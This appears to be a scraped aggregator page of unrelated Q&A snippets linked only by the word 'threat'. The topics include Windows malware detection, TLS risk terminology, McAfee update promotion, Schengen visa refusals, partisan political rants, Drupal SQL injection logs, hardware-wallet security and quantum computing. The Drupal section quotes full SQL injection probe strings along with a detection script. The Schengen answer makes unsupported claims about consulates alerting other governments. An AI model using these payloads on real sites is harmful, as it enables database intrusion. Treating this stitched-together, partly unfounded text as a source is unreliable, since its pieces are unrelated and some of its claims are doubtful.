malware: Windows threat detection

Is there a structured approach to performing threat detection in Windows?

I have seen SANS offering Windows forensics training, but I can't find any good resources to start with.

I know that I have been compromised because odd things keep happening on my computer; it would take me a while to describe every buggy thing my computer has been doing for the past few days. Anyway, I used Malwarebytes (lol) and downloaded CrowdStrike (ordered, but I can't find a way to use all the information it collects), and it seems that I'm not close to detecting what is causing these problems. I also have Process Hacker and check it from time to time on the Network tab to see if something is happening, but I cannot assume that what I am seeing is a threat, so please let me know how to conduct a decent threat investigation on my computer.

terminology: risk, threat, vulnerability with an example

Given a situation in which a system has SSL 3.0 and TLS 1.0 enabled, the following assignment would be accurate:

Weakness / vulnerability: The remote service accepts encrypted connections using TLS 1.0 and SSL 3.0.

Threat: An attacker can exploit these flaws to perform man-in-the-middle attacks or to decrypt communications between the affected service and its clients.

Risk = Threat × Vulnerability: So, in the previous case, would we calculate the risk by estimating the probability that an attacker could exploit the flaws in the TLS 1.0 and SSL 3.0 protocols?

Are my assumptions correct?
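To make the vulnerability line above concrete, here is an added example (not from the question or any answer) that does what a scanner does when it reports "accepts SSL 3.0 / TLS 1.0": it reads the protocol version the server selected from a captured ServerHello record and flags anything below TLS 1.2. The ServerHello bytes are constructed in-line for testing; the TLS 1.3 caveat is noted in the code.

```python
import struct

# Protocol versions as they appear on the wire: SSL 3.0 is 0x0300, TLS 1.x is 0x030(x+1)
VERSIONS = {0x0300: "SSL 3.0", 0x0301: "TLS 1.0", 0x0302: "TLS 1.1",
            0x0303: "TLS 1.2", 0x0304: "TLS 1.3"}
# A server selecting anything below TLS 1.2 is the weakness named in the question
WEAK = {0x0300, 0x0301, 0x0302}

def parse_server_hello(record):
    """Return the version the server selected in a raw ServerHello record,
    or None if the bytes are not a well-formed ServerHello.
    Caveat: a TLS 1.3 server writes 0x0303 here (legacy_version) and announces
    1.3 in the supported_versions extension, which this minimal parser skips."""
    if len(record) < 11 or record[0] != 22:          # content type 22 = handshake
        return None
    rec_len = struct.unpack("!H", record[3:5])[0]
    body = record[5:5 + rec_len]
    if len(body) < 6 or body[0] != 2:                # handshake type 2 = ServerHello
        return None
    hs_len = int.from_bytes(body[1:4], "big")
    if hs_len < 2 or len(body) < 4 + hs_len:
        return None
    return struct.unpack("!H", body[4:6])[0]

def assess(record):
    """Map a captured ServerHello to the vulnerability statement from the question:
    ('weak', name) when the service accepted SSL 3.0 / TLS 1.0 / TLS 1.1."""
    version = parse_server_hello(record)
    if version is None:
        return ("unparsed", None)
    name = VERSIONS.get(version, "unknown 0x%04x" % version)
    return ("weak" if version in WEAK else "ok", name)

def build_server_hello(version):
    """Constructed sample for testing: a minimal ServerHello (empty session id,
    one cipher suite, null compression) carried in a TLS 1.2 record header."""
    hello = (struct.pack("!H", version) + b"\x00" * 32   # version + 32-byte random
             + b"\x00" + b"\xc0\x2f" + b"\x00")          # sid length, suite, compression
    handshake = b"\x02" + len(hello).to_bytes(3, "big") + hello
    return b"\x16" + struct.pack("!HH", 0x0303, len(handshake)) + handshake
```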


Online threats are evolving, so our Internet security must evolve too. The Internet is full of things that are not healthy for your computer, such as viruses, malware, spyware, ransomware, etc. With hundreds of them emerging daily, sticking to a traditional antivirus program may not be enough to deal with the problem effectively.

Unlike free trial versions of McAfee products, McAfee Activate product key subscriptions provide full 360-degree protection with security updates, DAT files and threat detection technology. It analyzes and blocks existing viruses and newly emerging threats in the blink of an eye to close the gaps in your protection. You can activate McAfee products and updates through

Update your automatic virus detection engine with McAfee DAT files

Whether you chat, browse, shop, work or socialize, you get the best available protection with minimal interruptions and fast scanning for infected files and malware. Features such as scheduled scans and automatic security updates run while you are not using your computer; schedule the scan for when your PC is idle. In this way, McAfee keeps your PC's performance up and protects your system and network from potential online threats.

With the latest McAfee DAT updates, all information is visible on screen, eliminating pop-up windows and making navigation easier. Scheduled scanning and virus alerts help you monitor your PC's performance more closely than ever.

What is the purpose of DAT files?

McAfee DAT files contain virus signatures and other information that McAfee Activate products use to protect your devices against malicious content, ransomware and other potentially infected files in circulation. The update temporarily stops any active scanning process, service or other memory-resident software component that may interfere with the update. You can download DAT files from the link. McAfee also releases new DAT files to help users counter new potential threats evaluated by McAfee Labs.

How to download and install McAfee DAT files?

Locate the latest version of the DAT file you want to download, then save the file to your desktop.

. Choose the specific file to download according to the edition of your McAfee product.
. Create a temporary directory on your PC. A new folder on your desktop is fine.
. Download the XDAT file from the website and save it in the temporary folder.
. Double-click the downloaded XDAT file to start the update (the file is named in the nnnnXDAT.EXE format, where nnnn is the DAT version number).
. Follow the instructions on the screen.

The installer does the following:

. Stops antivirus scanning or services that use your current DAT files.
. Unloads McAfee software that is resident in memory.
. Copies the latest DAT files into the appropriate program directories.
. Restarts the application so that scanning continues with the new DAT files.

Once the installer finishes updating your DAT files, you can delete the downloaded file or keep it in case you need it for future updates.

Steve Smith is a technical writer who makes the complexity of any technology-related problem easier for readers to understand. Many popular electronic magazines have published his articles, and he also answers readers' technology questions.

Denial of a Schengen visa due to a threat to public policy, security or health

Denial for these reasons …

One or more member states consider you to be a threat to public
policy, internal security, public health as defined in Article 2(19)
of Regulation (EC) No 562/2006 (Schengen Borders Code) or the
international relations of one or more of the member states.

… means that you will need a lawyer who specializes in EU law. Asking for advice on the Internet is a waste of time because the answers will fall into one of four categories …

  • Get a lawyer
  • Do something stupid (forged passport or covert entry)
  • Jingoistic rants telling you and your kind to stay where you are
  • Incoherent nonsense from random morons

People who have been listed as threats to the security of the area have a history that requires a long conversation with a specialist, and there are no other viable alternatives. The same reasoning applies to questions about appealing the decision. Attempting an appeal on this ground is dangerous and, in addition, runs the risk that all your details enter the public domain! See a qualified practitioner!

The professional is needed even if the deadline for an appeal has elapsed. There are data protection laws and freedom of information laws that require local experience to navigate successfully. "Clearing your name" is not a simple job.

Related answer: Schengen visa refusal: the justification of the purpose and conditions of the planned stay was not reliable

NOTE: To pre-empt the natural corollary, let's add that …

  • The consulate has already told the Department of Homeland Security in
    the USA that you are trying to travel;
  • The consulate has already told the other Schengen members;
  • The consulate has informed its consular missions abroad; and
  • The consulate has informed the United Kingdom that you are trying to travel,
    and the United Kingdom in turn has informed the Republic of Ireland and the
    Commonwealth members to put a flag on your passport.

Update April 21, 2016

The questions from phoog (whom I thank) about the possibility that this refusal stems from mistaken identity led to an email exchange with a specialist. The upshot is that this reason ("One or more member states consider it a threat to public policy …") means that they had a biometric hit or some other conclusive positive match. It's not like the US no-fly list, where people with the same names generate confusion. Instead, it means that that person (and no one else) is in trouble, and it won't be fixed in the short term. Therefore, the previous answer still applies. I am taking the advanced Schengen law course this summer and may add another update to this answer after that.

Also note that if they cannot obtain a positive and verifiable match, they will not use this ground; instead, they will use: Schengen visa refusal: the justification for the purpose and conditions of the intended stay was not reliable.

Related article on how to request your Schengen Information System record: How can I find out if someone is in the Schengen Information System (SIS)? Note: Even if you find wrong information in your record, you will still need a skilled professional to have it officially deleted and your status restored.

Did Trump order the murder of a foreign leader based on evidence of a threat and with an eye on domestic politics?


In fact, I'm glad he did.

Iran came looking for a fight. Iraq is just using any excuse to get rid of the US so they can go back to what they were doing before the US invaded.

Good for me.

Bring our troops home.

Killing the Iranian general puts the US in an awkward position regarding security, but our government has the right to protect our shxt.

However, Trump has an obligation to consult Congress FIRST, before any attack on other nations.

Is the impeachment a coup d'état or an essential American act in response to the threat of dictatorship?

It is neither. But Pelosi and Nadler are using it as a political weapon. "I am not in favor of impeachment without bipartisan support. It is so divisive for the country that it must have bipartisan support … It has to be a bipartisan initiative." – Pelosi

Yes, liar.

and Nadler …

"If you really take seriously the removal of a president from office for high crimes and misdemeanors, you should not do so unless you get at least a significant fraction of the people who voted for him, from the other party, to agree, reluctantly perhaps, to accept that 'yes, you had to do it', otherwise you will have 20 years of recriminations: We won the election, you stole it from us. You don't want to divide the country in that way." – Nadler

Yes, right hypocrite.

8 – MySQL injections: Are they a threat?

For a while now, all my Drupal 7 and Drupal 8 instances have been under constant attack from South America or Asia, where the attacker is trying to break into Drupal with MySQL injections.

The attack is done by adding MySQL queries to the URL:
URL: AND 8205=8205 AND (2155=2155 AND 4874=9552 AND 8205=8205') AND 5487=2530 AND ('Kcfy'='Kcfy') AND 8205=8205 AND ('nUHc'='nUHc' AND 9068=8481 AND 'wbYZ'='wbYZ' AND 8205=8205 AND 'DeAs'='DeAs' AND 7985=5834 AND '%'='' AND 8205=8205 AND '%'=' AND 5913=3547-- BaJk AND 8205=8205-- jBam
(SELECT (CASE WHEN (9523=9523) THEN 9523 ELSE 9523*(SELECT 9523 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) AND (SELECT 1687 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(1687=1687,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3698=3698 AND (SELECT 1687 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(1687=1687,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)') AND (SELECT 1687 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(1687=1687,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('XLCQ'='XLCQ' AND (SELECT 1687 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(1687=1687,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Witz'='Witz' AND (SELECT 1687 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(1687=1687,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' AND (SELECT 1687 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(1687=1687,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- OHLo AND 3711=CAST((CHR(113)||CHR(113)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3711=3711) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC) AND (3563=3563 AND 3711=CAST((CHR(113)||CHR(113)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3711=3711) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC)

Can anyone tell me what these attacks are about? Was there a bug in Drupal that made it vulnerable to these attacks? Is anyone else experiencing them?
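An added example from the defender's side (not from the question or any answer): the strings quoted above are the boolean-based and error-based probes an automated scanner emits (the FLOOR(RAND(0)*2) … GROUP BY construct is a classic MySQL error-based technique, and the random four-letter tails are typical of sqlmap), and this Python turns them into detection rules run over a constructed web access log. The log lines, paths and IP addresses are made up for the example.

```python
import re
from urllib.parse import unquote_plus

# Patterns lifted from the probe strings quoted in the question (constructed regexes,
# not a complete SQLi ruleset): numeric and string tautology pairs, the FLOOR(RAND(0)*2)
# duplicate-key error trick, INFORMATION_SCHEMA reads and the random comment tail.
RULES = [
    ("boolean tautology", re.compile(r"\bAND\s*\(*\s*(\d+)\s*=\s*\1\b", re.I)),
    ("string tautology",  re.compile(r"\bAND\s*\(*\s*'([^']*)'\s*=\s*'\1'", re.I)),
    ("error-based probe", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("schema read",       re.compile(r"\bINFORMATION_SCHEMA\.", re.I)),
    ("comment tail",      re.compile(r"--\s*\w+\s*$")),
]

# Apache/Nginx combined log line: ip ident user [time] "METHOD path HTTP/x" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>\w+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify_request(path):
    """Return the names of the rules that fire on a request path (URL-decoded
    first, since scanners percent-encode the payload)."""
    decoded = unquote_plus(path)
    return [name for name, rx in RULES if rx.search(decoded)]

def scan_log(lines):
    """Return (client ip, path without query, matched rules) for suspicious requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m["path"])
        if tags:
            hits.append((m["ip"], m["path"].split("?", 1)[0], tags))
    return hits

# Constructed sample log: two probes against a Drupal node path and one normal request.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2020:03:14:07 +0000] "GET /node/12?nid=12%20AND%208205%3D8205'
    '%20AND%20%282155%3D2155 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Jan/2020:03:14:08 +0000] "GET /node/12?nid=12%20AND%20%28SELECT%201687'
    '%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71717a6a71%2C%28SELECT%20%28ELT%281687'
    '%3D1687%2C1%29%29%29%2C0x716b716b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM'
    '%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 HTTP/1.1" 500 312',
    '198.51.100.4 - - [10/Jan/2020:03:15:01 +0000] "GET /node/12?page=2 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, path, tags in scan_log(SAMPLE_LOG):
        print(ip, path, ", ".join(tags))
```

A 500 response paired with the error-based pattern is the signal worth alerting on: it means the database error text may have reached the attacker. Whether the injection actually succeeded still depends on the Drupal version and the query that was hit, which is the question the author asks.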

ledger: What is the threat model of a Bitcoin HSM / Hardware wallet?

What is the threat model they protect against, and what are they vulnerable to?

Hardware wallets are security devices with different features and hardware, but the general concept is largely the same. A trusted device holds the cryptographic keys, lets you view information on a dedicated screen and accepts secure input through its own interface (buttons or a touch screen).


In the hardware wallet security model, a user interacts with their untrusted host device to build a transaction paying an amount to an address; the transaction is then sent to the hardware wallet for assembly, including the cryptographic signatures. The user is expected to verify the information displayed (that is, the amount) and acknowledge the transaction on the device. Each transaction needs explicit acknowledgement on the hardware device, and the host cannot make transactions without that approval.

This differs from the traditional software wallet model, where a user interacting with an untrusted host, by entering the wallet's encryption key, can make any arbitrary transaction of any amount to any destination.

How much do the commonly recommended practices for using these devices improve the security of storing Bitcoin with them?

Much of the security advice given about using hardware wallets provides very little additional security, or only the illusion of security rather than genuinely effective measures.


A frequently repeated security measure is to verify that the address shown on your hardware wallet matches the one you tried to send to using the companion application on the host computer. This makes no sense, since the destination address is provided by the untrusted host. A mismatched address would indicate nothing but a serious software failure on the device's part.

How safe are these devices to store Bitcoin?

At best, device security rests on trust in the manufacturer, since it is extremely easy for software errors to allow the complete theft or loss of funds, and for invisible backdoors to be inserted. History has shown that many of the available devices are plagued by serious code quality problems, make bad choices in the security design of their hardware and are otherwise an unsafe option for storing funds.

Backdoors

Backdoors in Bitcoin transactions, specifically due to some properties of ECDSA, are trivial to produce and extremely difficult to detect, especially if they are triggered only sporadically. ECDSA signatures contain a number that is generated from a supposedly random source; however, if this number is crafted to contain third-party values, the secret private key or other information can be leaked while the signature remains valid. Modern software implementations of ECDSA use deterministic generation (5) for the secret nonce value, but this is not verifiable without using the private key for validation.

Code quality

All current devices have shown serious problems in their open-source ECDSA implementations, or simply keep their implementation completely closed to evade analysis.

  1. The Bitcoin Trezor originally shipped with an ECDSA implementation based on a Python library transcribed into C. This code was comically slow and exposed a (very large timing side channel) (6). Being physically near the device while it signed a transaction exposed enough information at runtime to recover private key material. Trezor has had a considerable number of bootloader, timing analysis, power analysis and hardware vulnerabilities.

  2. The Ledger Nano had an amateurish bug in its bootloader that allowed security to be completely bypassed on at least the main processor, which handles user input and communication. On most microcontrollers the memory map has mirrored regions, with multiple addresses at which the same data can be accessed; the bootloader simply did not account for this and allowed arbitrary changes to security-sensitive code.

  3. The CoinKite hardware series uses micro-ecc, an abandoned "ECDSA for Arduino" library that contains absolutely no tests and is vulnerable to at least one timing attack.

Using a hardware wallet to store Bitcoin is not a bulletproof option; it is a considered set of security trade-offs that requires consideration and understanding of the threats and weaknesses of the devices.

[ Global Warming ] Open question: Do scientists have a moral obligation to clearly warn humanity of any catastrophic threat and to "say it as it is"?

More than 11,000 scientists from more than 150 countries have signed a joint declaration of a climate change emergency, citing 40 years of research showing that the world is heading towards "untold human suffering" unless steps are taken to reduce greenhouse gas emissions.

Quantum computing: Google's Sycamore processor has processed 2^53 states in parallel. Is this a threat to Bitcoin?

Today, it has been confirmed that Google's Sycamore quantum computer processes 53 qubits in parallel.

In practical terms, for non-quantum experts, how relevant is this progress in terms of secp256k1 and SHA256?

Does this new development arrive earlier than expected, or is it within the expected quantum security margin of Bitcoin, which was supposed to be a couple of decades before quantum computing threatens the "mathematical shields" of the cryptocurrency?

Reference: quantum computing takes flight